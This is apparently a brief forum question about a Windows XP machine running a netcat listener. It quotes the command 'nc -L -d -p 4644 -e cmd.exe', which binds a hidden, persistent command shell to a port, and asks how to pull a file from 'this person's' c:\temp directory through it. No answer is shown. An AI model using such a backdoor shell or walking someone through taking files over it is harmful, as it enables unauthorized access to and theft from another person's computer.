I've a little question.
suppose someone (using windows XP) has running netcat as a listener:
nc -L -d -p 4644 -e cmd.exe
and, suppose I want a file on the c:\temp\ directory of this person,
how can I grab the file (I'm also using windows XP)